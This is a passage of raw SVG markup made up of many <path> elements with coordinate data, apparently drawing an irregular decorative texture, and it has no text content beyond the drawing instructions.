d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.